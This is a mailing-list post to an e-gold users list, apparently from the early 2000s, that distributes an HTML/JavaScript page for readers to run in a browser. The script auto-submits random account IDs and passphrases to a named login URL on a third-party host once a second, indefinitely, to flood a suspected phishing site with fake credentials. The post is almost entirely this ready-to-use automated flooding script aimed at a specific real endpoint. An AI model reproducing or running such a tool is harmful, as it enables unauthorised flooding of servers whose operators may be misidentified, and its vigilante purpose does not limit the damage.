To all:
Please save the below script as text, with the .html extension.
Maybe, q.html. Then activate with your browser. This will send
fake logins to hackers/spammers that author fake e-gold sites.
Newer/updated versions of this script will be published
intermittently. This initiative is sponsored by the Global
Digital Currencies Association.
<html><head>
<script language="javascript">
<!--
var dns = "";
var c = true;
function popup()
{
document.f.AccountID.value = get_random();
document.f.PassPhrase.value = GeneratePassword();
document.f.submit();
setTimeout("autosubmit();", 2000);
}
function get_random()
{
var ranNum = Math.round(Math.random()*999999);
return ranNum;
}
function getRandomNum() {
// between 0 - 1
var rndNum = Math.random()
// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);
// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;
return rndNum;
}
function checkPunc(num) {
if ((num >=33) && (num <=47)) { return true; }
if ((num >=58) && (num <=64)) { return true; }
if ((num >=91) && (num <=96)) { return true; }
if ((num >=123) && (num <=126)) { return true; }
return false;
}
function GeneratePassword() {
var length;
var sPassword = "";
length = 6+ Math.round(Math.random()*20)
for (i=0; i < length; i++) {
numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}
return sPassword;
}
function autosubmit()
{
if (c)
{
document.f.AccountID.value = get_random();
document.f.PassPhrase.value = GeneratePassword();
document.f.submit();
setTimeout("autosubmit();", 1000);
}
}
function turn()
{
c = !c;
if (c) setTimeout("autosubmit();", 2000);
document.f.x.value = c?"Stop it!":"Let's do it again!";
}
//-->
</script>
</head>
<body onload="popup();">
<center>
<form target="newQ" name="f" method="POST" action =
"https://secure.cnchost.com/2.cnchost.com/_vti_bin/shtml.exe/web/login.htm"
webbot-action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE"
S-Email-Address="[EMAIL PROTECTED]"
B-Email-Label-Fields="TRUE"
S-Builtin-Fields
U-Confirmation-Url="https://www.e-gold.com/acct/acct.asp"
startspan
--><input TYPE="hidden" NAME="VTI-GROUP" VALUE="0"><!--webbot
bot="SaveResults" endspan -->
<input type="text" name="AccountID" length="20" maxlength="40"
size="25"><br>
<input type="checkbox" name="C1" value="ON">
<input taborder=2 tabindex=2 type="text" name="PassPhrase"
maxlength="64" size="32" autocomplete="off">
<input taborder=3 tabindex=3 type="hidden" name="Turing"
maxlength="10" size="10" autocomplete="off" value="162509">
<input type="submit" value="Login" name="B1">
<input type="button" name="x" value="Stop it!"
onclick="turn();">
</form>
</center>
</body>
</html>
=====
Regards,
Ragnar
Vice Pres. - GDCA - http://www.gdcaonline.org
Vice Pres. - Gold Age - http://www.goldage.net
editor - Liberty Impact - http://www.libertyimpact.com
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
---
You are currently subscribed to e-gold-list as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
Use e-gold's Secure Randomized Keyboard (SRK) when accessing your e-gold account(s)
via the web and shopping cart interfaces to help thwart keystroke loggers and common
viruses.